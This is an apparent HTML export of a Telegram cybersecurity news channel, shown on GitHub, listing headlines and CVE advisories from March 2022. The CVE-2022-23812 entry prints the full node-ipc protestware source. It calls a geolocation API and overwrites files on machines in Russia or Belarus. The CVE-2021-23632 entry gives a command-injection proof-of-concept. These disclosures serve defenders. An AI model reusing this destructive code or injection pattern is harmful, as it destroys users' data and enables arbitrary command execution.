-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmessages40.html
3746 lines (2339 loc) · 148 KB
/
messages40.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/>
<title>Exported Data</title>
<meta content="width=device-width, initial-scale=1.0" name="viewport"/>
<link href="css/style.css" rel="stylesheet"/>
<script src="js/script.js" type="text/javascript">
</script>
</head>
<body onload="CheckLocation();">
<div class="page_wrap">
<div class="page_header">
<div class="content">
<div class="text bold">
🛡 Cybersecurity & Privacy news 🛡
</div>
</div>
</div>
<div class="page_body chat_page">
<div class="history">
<a class="pagination block_link" href="messages39.html">
Previous messages
</a>
<div class="message service" id="message-1079">
<div class="body details">
16 March 2022
</div>
</div>
<div class="message default clearfix" id="message39098">
<div class="pull_left userpic_wrap">
<div class="userpic userpic4" style="width: 42px; height: 42px">
<div class="initials" style="line-height: 42px">
?
</div>
</div>
</div>
<div class="body">
<div class="pull_right date details" title="16.03.2022 14:45:19">
14:45
</div>
<div class="from_name">
🛡 Cybersecurity & Privacy news 🛡
</div>
<div class="text">
<strong>🛠 OpenSSL Toolkit 3.0.2 🛠</strong><br><br><code>OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols with full-strength cryptography world-wide. The 3.x series is the current major version of OpenSSL.</code><br><br><a href="https://packetstormsecurity.com/files/166342/openssl-3.0.2.tar.gz">📖 Read</a><br><br>via "<em>Packet Storm Security</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39099">
<div class="body">
<div class="pull_right date details" title="16.03.2022 14:55:33">
14:55
</div>
<div class="text">
<strong>❌ ‘CryptoRom’ Crypto-Scam is Back via Side-Loaded Apps ❌</strong><br><br><code>Scammers are bypassing Apple's App Store security, stealing thousands of dollars’ worth of cryptocurrency from the unwitting, using the TestFlight and WebClips programs.</code><br><br><a href="https://threatpost.com/cryptorom-crypto-scam-side-loaded-apple-apps/178942/">📖 Read</a><br><br>via "<em>Threat Post</em>".
</div>
</div>
</div>
<div class="message default clearfix" id="message39100">
<div class="pull_left userpic_wrap">
<div class="userpic userpic4" style="width: 42px; height: 42px">
<div class="initials" style="line-height: 42px">
?
</div>
</div>
</div>
<div class="body">
<div class="pull_right date details" title="16.03.2022 15:20:32">
15:20
</div>
<div class="from_name">
🛡 Cybersecurity & Privacy news 🛡
</div>
<div class="text">
<strong>‼ CVE-2021-23648 ‼</strong><br><br><code>The package @braintree/sanitize-url before 6.0.0 are vulnerable to Cross-site Scripting (XSS) due to improper sanitization in sanitizeUrl function.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-23648">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39101">
<div class="body">
<div class="pull_right date details" title="16.03.2022 15:20:33">
15:20
</div>
<div class="text">
<strong>‼ CVE-2022-21164 ‼</strong><br><br><code>The package node-lmdb before 0.9.7 are vulnerable to Denial of Service (DoS) when defining a non-invokable ToString value, which will cause a crash during type check.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-21164">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39102">
<div class="body">
<div class="pull_right date details" title="16.03.2022 15:20:34">
15:20
</div>
<div class="text">
<strong>‼ CVE-2022-23812 ‼</strong><br><br><code>This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ?? } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-23812">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39103">
<div class="body">
<div class="pull_right date details" title="16.03.2022 15:20:36">
15:20
</div>
<div class="text">
<strong>‼ CVE-2021-45822 ‼</strong><br><br><code>A cross-site scripting vulnerability is present in Xbtit 3.1. The stored XSS vulnerability occurs because /ajaxchat/sendChatData.php does not properly validate the value of the "n" (POST) parameter. Through this vulnerability, an attacker is capable to execute malicious JavaScript code.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-45822">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39104">
<div class="body">
<div class="pull_right date details" title="16.03.2022 15:20:38">
15:20
</div>
<div class="text">
<strong>‼ CVE-2022-24729 ‼</strong><br><br><code>CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. CKEditor4 prior to version 4.18.0 contains a vulnerability in the `dialog` plugin. The vulnerability allows abuse of a dialog input validator regular expression, which can cause a significant performance drop resulting in a browser tab freeze. A patch is available in version 4.18.0. There are currently no known workarounds.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24729">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39105">
<div class="body">
<div class="pull_right date details" title="16.03.2022 15:20:40">
15:20
</div>
<div class="text">
<strong>‼ CVE-2022-24728 ‼</strong><br><br><code>CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. A vulnerability has been discovered in the core HTML processing module and may affect all plugins used by CKEditor 4 prior to version 4.18.0. The vulnerability allows someone to inject malformed HTML bypassing content sanitization, which could result in executing JavaScript code. This problem has been patched in version 4.18.0. There are currently no known workarounds.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24728">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix" id="message39106">
<div class="pull_left userpic_wrap">
<div class="userpic userpic4" style="width: 42px; height: 42px">
<div class="initials" style="line-height: 42px">
?
</div>
</div>
</div>
<div class="body">
<div class="pull_right date details" title="16.03.2022 18:36:24">
18:36
</div>
<div class="from_name">
🛡 Cybersecurity & Privacy news 🛡
</div>
<div class="text">
<strong>🕴 Microsoft the No. 1 Most-Spoofed Brand in Phishing Attacks 🕴</strong><br><br><code>New Barracuda Networks data shows attackers sent some 3 million emails from around 12,000 pilfered accounts.</code><br><br><a href="https://www.darkreading.com/vulnerabilities-threats/microsoft-the-1-most-spoofed-brand-in-phishing-attacks">📖 Read</a><br><br>via "<em>Dark Reading</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39107">
<div class="body">
<div class="pull_right date details" title="16.03.2022 18:36:25">
18:36
</div>
<div class="text">
<strong>🕴 What the Newly Signed US Cyber-Incident Law Means for Security 🕴</strong><br><br><code>Bipartisan cybersecurity legislation comes amid increased worries over ransomware, and fears of cyberattacks from Russia in the wake of its invasion of Ukraine.</code><br><br><a href="https://www.darkreading.com/attacks-breaches/new-cyber-incident-law-not-a-national-breach-law-but-a-major-first-step">📖 Read</a><br><br>via "<em>Dark Reading</em>".
</div>
</div>
</div>
<div class="message default clearfix" id="message39108">
<div class="pull_left userpic_wrap">
<div class="userpic userpic4" style="width: 42px; height: 42px">
<div class="initials" style="line-height: 42px">
?
</div>
</div>
</div>
<div class="body">
<div class="pull_right date details" title="16.03.2022 19:20:44">
19:20
</div>
<div class="from_name">
🛡 Cybersecurity & Privacy news 🛡
</div>
<div class="text">
<strong>‼ CVE-2022-26295 ‼</strong><br><br><code>A stored cross-site scripting (XSS) vulnerability in /ptms/?page=user of Online Project Time Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the user name field.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26295">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39109">
<div class="body">
<div class="pull_right date details" title="16.03.2022 19:20:45">
19:20
</div>
<div class="text">
<strong>‼ CVE-2022-26293 ‼</strong><br><br><code>Online Project Time Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in the function save_employee at /ptms/classes/Users.php.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26293">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix" id="message39110">
<div class="pull_left userpic_wrap">
<div class="userpic userpic4" style="width: 42px; height: 42px">
<div class="initials" style="line-height: 42px">
?
</div>
</div>
</div>
<div class="body">
<div class="pull_right date details" title="16.03.2022 19:36:33">
19:36
</div>
<div class="from_name">
🛡 Cybersecurity & Privacy news 🛡
</div>
<div class="text">
<strong>🕴 4 Critical Capabilities for a SaaS Security Posture Management (SSPM) Solution 🕴</strong><br><br><code>The need for deep visibility and remediation for SaaS security settings is critical. If you're considering a SaaS Security Posture Management solution, here’s a checklist of what to look for.</code><br><br><a href="https://www.darkreading.com/cloud/4-critical-capabilities-for-a-saas-security-posture-management-sspm-solution-">📖 Read</a><br><br>via "<em>Dark Reading</em>".
</div>
</div>
</div>
<div class="message default clearfix" id="message39111">
<div class="pull_left userpic_wrap">
<div class="userpic userpic4" style="width: 42px; height: 42px">
<div class="initials" style="line-height: 42px">
?
</div>
</div>
</div>
<div class="body">
<div class="pull_right date details" title="16.03.2022 20:12:43">
20:12
</div>
<div class="from_name">
🛡 Cybersecurity & Privacy news 🛡
</div>
<div class="text">
<strong>🕴 How Pen Testing Gains Critical Security Buy-in and Defense Insight 🕴</strong><br><br><code>It's more important than ever for companies to challenge their defenses, learning about new gaps and opportunities for improvement along the way.</code><br><br><a href="https://www.darkreading.com/edge-articles/how-pen-testing-gains-critical-security-buy-in-and-defense-insight">📖 Read</a><br><br>via "<em>Dark Reading</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39112">
<div class="body">
<div class="pull_right date details" title="16.03.2022 20:12:45">
20:12
</div>
<div class="text">
<strong>🕴 TAC Security Survey Reveals: 88% of Businesses Rely on Manual Processes to Identify Network Vulnerabilities 🕴</strong><br><br><br><br><a href="https://www.darkreading.com/perimeter/tac-security-survey-reveals-88-of-businesses-rely-on-manual-processes-to-identify-network-vulnerabilities">📖 Read</a><br><br>via "<em>Dark Reading</em>".
</div>
</div>
</div>
<div class="message service" id="message-1080">
<div class="body details">
17 March 2022
</div>
</div>
<div class="message default clearfix" id="message39113">
<div class="pull_left userpic_wrap">
<div class="userpic userpic4" style="width: 42px; height: 42px">
<div class="initials" style="line-height: 42px">
?
</div>
</div>
</div>
<div class="body">
<div class="pull_right date details" title="17.03.2022 07:21:17">
07:21
</div>
<div class="from_name">
🛡 Cybersecurity & Privacy news 🛡
</div>
<div class="text">
<strong>‼ CVE-2022-24075 ‼</strong><br><br><code>Whale browser before 3.12.129.18 allowed extensions to replace JavaScript files of the HWP viewer website which could access to local HWP files. When the HWP files were opened, the replaced script could read the files.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24075">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39114">
<div class="body">
<div class="pull_right date details" title="17.03.2022 07:21:18">
07:21
</div>
<div class="text">
<strong>‼ CVE-2022-24074 ‼</strong><br><br><code>Whale Bridge, a default extension in Whale browser before 3.12.129.18, allowed to receive any SendMessage request from the content script itself that could lead to controlling Whale Bridge if the rendering process compromises.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24074">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39115">
<div class="body">
<div class="pull_right date details" title="17.03.2022 07:21:19">
07:21
</div>
<div class="text">
<strong>‼ CVE-2022-24073 ‼</strong><br><br><code>The Web Request API in Whale browser before 3.12.129.18 allowed to deny access to the extension store or redirect to any URL when users access the store.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24073">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39116">
<div class="body">
<div class="pull_right date details" title="17.03.2022 07:21:20">
07:21
</div>
<div class="text">
<strong>‼ CVE-2022-24072 ‼</strong><br><br><code>The devtools API in Whale browser before 3.12.129.18 allowed extension developers to inject arbitrary JavaScript into the extension store web page via devtools.inspectedWindow, leading to extensions downloading and uploading when users open the developer tool.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24072">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix" id="message39117">
<div class="pull_left userpic_wrap">
<div class="userpic userpic4" style="width: 42px; height: 42px">
<div class="initials" style="line-height: 42px">
?
</div>
</div>
</div>
<div class="body">
<div class="pull_right date details" title="17.03.2022 09:26:22">
09:26
</div>
<div class="from_name">
🛡 Cybersecurity & Privacy news 🛡
</div>
<div class="text">
<strong>‼ CVE-2022-1000 ‼</strong><br><br><code>Path Traversal in GitHub repository prasathmani/tinyfilemanager prior to 2.4.7.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-1000">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39118">
<div class="body">
<div class="pull_right date details" title="17.03.2022 09:26:24">
09:26
</div>
<div class="text">
<strong>‼ CVE-2021-45791 ‼</strong><br><br><code>Slims8 Akasia 8.3.1 is affected by SQL injection in /admin/modules/bibliography/index.php, /admin/modules/membership/member_type.php, /admin/modules/system/user_group.php, and /admin/modules/membership/index.php through the dir parameter. It can be used by remotely authenticated librarian users.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-45791">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39119">
<div class="body">
<div class="pull_right date details" title="17.03.2022 09:26:25">
09:26
</div>
<div class="text">
<strong>‼ CVE-2021-45792 ‼</strong><br><br><code>Slims9 Bulian 9.4.2 is affected by Cross Site Scripting (XSS) in /admin/modules/system/custom_field.php.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-45792">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39120">
<div class="body">
<div class="pull_right date details" title="17.03.2022 09:32:05">
09:32
</div>
<div class="text">
<strong>🕴 Enhancing DLP With Natural Language Understanding for Better Email Security 🕴</strong><br><br><code>Natural language understanding is well-suited for scanning enterprise email to detect and filter out spam and other malicious content. Armorblox introduces a data loss prevention service to its email security platform using NLU.</code><br><br><a href="https://www.darkreading.com/emerging-tech/enhancing-dlp-with-natural-language-understanding-for-better-email-security">📖 Read</a><br><br>via "<em>Dark Reading</em>".
</div>
</div>
</div>
<div class="message default clearfix" id="message39121">
<div class="pull_left userpic_wrap">
<div class="userpic userpic4" style="width: 42px; height: 42px">
<div class="initials" style="line-height: 42px">
?
</div>
</div>
</div>
<div class="body">
<div class="pull_right date details" title="17.03.2022 10:00:16">
10:00
</div>
<div class="from_name">
🛡 Cybersecurity & Privacy news 🛡
</div>
<div class="text">
<strong>🗓️ ‘Fox guarding the henhouse’ – Founder of cyber-fraud prevention company pleads guilty to defrauding investors 🗓️</strong><br><br><code>Adam Rogas has been charged with using fraudulent financial data to secure more than $100m in funding</code><br><br><a href="https://portswigger.net/daily-swig/fox-guarding-the-henhouse-founder-of-cyber-fraud-prevention-company-pleads-guilty-to-defrauding-investors">📖 Read</a><br><br>via "<em>The Daily Swig</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39122">
<div class="body">
<div class="pull_right date details" title="17.03.2022 10:00:17">
10:00
</div>
<div class="text">
<strong>📢 Germany advises against using Kaspersky software due to hacking risk 📢</strong><br><br><code>The Moscow-headquartered cyber security company has a history of being targeted for its alleged links to the Russian state</code><br><br><a href="https://www.itpro.co.uk/security/cyber-security/366989/germany-warns-kaspersky-software-cyber-security-risk">📖 Read</a><br><br>via "<em>ITPro</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39123">
<div class="body">
<div class="pull_right date details" title="17.03.2022 10:00:19">
10:00
</div>
<div class="text">
<strong>📢 NortonLifeLock and Avast merger could reduce competition, CMA warns 📢</strong><br><br><code>The watchdog will launch a phase two investigation into the merger unless NortonLifeLock and Avast address its concerns within five days</code><br><br><a href="https://www.itpro.co.uk/business-strategy/mergers-and-acquisitions/366994/nortonlifelock-avast-merger-could-reduce-competition-cma">📖 Read</a><br><br>via "<em>ITPro</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39124">
<div class="body">
<div class="pull_right date details" title="17.03.2022 10:00:20">
10:00
</div>
<div class="text">
<strong>📢 NSW ditches e-voting system for 2023 election 📢</strong><br><br><code>The electoral commissioner has suggested there should be a review of internet voting following the problems with the system found last December</code><br><br><a href="https://www.itpro.co.uk/business/policy-legislation/366990/nsw-ditches-ivote-2023-election">📖 Read</a><br><br>via "<em>ITPro</em>".
</div>
</div>
</div>
<div class="message default clearfix" id="message39125">
<div class="pull_left userpic_wrap">
<div class="userpic userpic4" style="width: 42px; height: 42px">
<div class="initials" style="line-height: 42px">
?
</div>
</div>
</div>
<div class="body">
<div class="pull_right date details" title="17.03.2022 10:28:49">
10:28
</div>
<div class="from_name">
🛡 Cybersecurity & Privacy news 🛡
</div>
<div class="text">
<strong>⚠ CISA warning: “Russian actors bypassed 2FA” – what happened and how to avoid it ⚠</strong><br><br><code>Don't leave old accounts lying around where someone sketchy could reactivate them.</code><br><br><a href="https://nakedsecurity.sophos.com/2022/03/16/russian-actors-bypass-2fa-story-what-happened-and-how-to-avoid-it/">📖 Read</a><br><br>via "<em>Naked Security</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39126">
<div class="body">
<div class="pull_right date details" title="17.03.2022 10:28:50">
10:28
</div>
<div class="text">
<strong>⚠ Beware bogus Betas – cryptocoin scammers abuse Apple’s TestFlight system ⚠</strong><br><br><code>"Install this moneymaking app" - this one is so special that it isn't available on Google Play or the App Store!</code><br><br><a href="https://nakedsecurity.sophos.com/2022/03/16/beware-bogus-betas-cryptocoin-scammers-abuse-apples-testflight-system/">📖 Read</a><br><br>via "<em>Naked Security</em>".
</div>
</div>
</div>
<div class="message default clearfix" id="message39127">
<div class="pull_left userpic_wrap">
<div class="userpic userpic4" style="width: 42px; height: 42px">
<div class="initials" style="line-height: 42px">
?
</div>
</div>
</div>
<div class="body">
<div class="pull_right date details" title="17.03.2022 11:02:10">
11:02
</div>
<div class="from_name">
🛡 Cybersecurity & Privacy news 🛡
</div>
<div class="text">
<strong>⚠ S3 Ep74: Cybercrime busts, Apple patches, Pi Day, and disconnect effects [Podcast] ⚠</strong><br><br><code>Latest episode - listen now!</code><br><br><a href="https://nakedsecurity.sophos.com/2022/03/17/s3-ep74-cybercrime-busts-apple-patches-pi-day-and-disconnect-effects-podcast/">📖 Read</a><br><br>via "<em>Naked Security</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39128">
<div class="body">
<div class="pull_right date details" title="17.03.2022 11:02:12">
11:02
</div>
<div class="text">
<strong>🕴 Cut Down on Alert Overload and Leverage Layered Security Measures 🕴</strong><br><br><code>Feeling overwhelmed by the number of alerts? It doesn't have to be that way.</code><br><br><a href="https://www.darkreading.com/attacks-breaches/cut-down-on-alert-overload-and-leverage-layered-security-measures">📖 Read</a><br><br>via "<em>Dark Reading</em>".
</div>
</div>
</div>
<div class="message default clearfix" id="message39129">
<div class="pull_left userpic_wrap">
<div class="userpic userpic4" style="width: 42px; height: 42px">
<div class="initials" style="line-height: 42px">
?
</div>
</div>
</div>
<div class="body">
<div class="pull_right date details" title="17.03.2022 11:21:28">
11:21
</div>
<div class="from_name">
🛡 Cybersecurity & Privacy news 🛡
</div>
<div class="text">
<strong>‼ CVE-2022-24761 ‼</strong><br><br><code>Waitress is a Web Server Gateway Interface server for Python 2 and 3. When using Waitress versions 2.1.0 and prior behind a proxy that does not properly validate the incoming HTTP request matches the RFC7230 standard, Waitress and the frontend proxy may disagree on where one request starts and where it ends. This would allow requests to be smuggled via the front-end proxy to waitress and later behavior. There are two classes of vulnerability that may lead to request smuggling that are addressed by this advisory: The use of Python's `int()` to parse strings into integers, leading to `+10` to be parsed as `10`, or `0x01` to be parsed as `1`, where as the standard specifies that the string should contain only digits or hex digits; and Waitress does not support chunk extensions, however it was discarding them without validating that they did not contain illegal characters. This vulnerability has been patched in Waitress 2.1.1. A workaround is available. When deploying a proxy in front of waitress, turning on any and all functionality to make sure that the request matches the RFC7230 standard. Certain proxy servers may not have this functionality though and users are encouraged to upgrade to the latest version of waitress instead.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24761">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39130">
<div class="body">
<div class="pull_right date details" title="17.03.2022 11:21:29">
11:21
</div>
<div class="text">
<strong>‼ CVE-2021-23632 ‼</strong><br><br><code>All versions of package git are vulnerable to Remote Code Execution (RCE) due to missing sanitization in the Git.git method, which allows execution of OS commands rather than just git commands. Steps to Reproduce 1. Create a file named exploit.js with the following content: js var Git = require("git").Git; var repo = new Git("repo-test"); var user_input = "version; date"; repo.git(user_input, function(err, result) { console.log(result); }) 2. In the same directory as exploit.js, run npm install git. 3. Run exploit.js: node exploit.js. You should see the outputs of both the git version and date command-lines. Note that the repo-test Git repository does not need to be present to make this PoC work.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-23632">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39131">
<div class="body">
<div class="pull_right date details" title="17.03.2022 11:21:31">
11:21
</div>
<div class="text">
<strong>‼ CVE-2021-44260 ‼</strong><br><br><code>A vulnerability is in the 'live_mfg.html' page of the WAVLINK AC1200, version WAVLINK-A42W-1.27.6-20180418, which can allow a remote attacker to access this page without any authentication. When processed, it exposes some key information of the manager of router.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44260">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39132">
<div class="body">
<div class="pull_right date details" title="17.03.2022 11:21:32">
11:21
</div>
<div class="text">
<strong>‼ CVE-2021-44908 ‼</strong><br><br><code>SailsJS Sails.js <=1.4.0 is vulnerable to Prototype Pollution via controller/load-action-modules.js, function loadActionModules().</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44908">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39133">
<div class="body">
<div class="pull_right date details" title="17.03.2022 11:21:33">
11:21
</div>
<div class="text">
<strong>‼ CVE-2021-44261 ‼</strong><br><br><code>A vulnerability is in the 'BRS_top.html' page of the Netgear W104, version WAC104-V1.0.4.13, which can allow a remote attacker to access this page without any authentication. When processed, it exposes firmware version information for the device.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44261">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39134">
<div class="body">
<div class="pull_right date details" title="17.03.2022 11:21:34">
11:21
</div>
<div class="text">
<strong>‼ CVE-2021-44262 ‼</strong><br><br><code>A vulnerability is in the 'MNU_top.htm' page of the Netgear W104, version WAC104-V1.0.4.13, which can allow a remote attacker to access this page without any authentication. When processed, it exposes some key information for the device.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44262">📖 Read</a><br><br>via "<em>National Vulnerability Database</em>".
</div>
</div>
</div>
<div class="message default clearfix joined" id="message39135">
<div class="body">
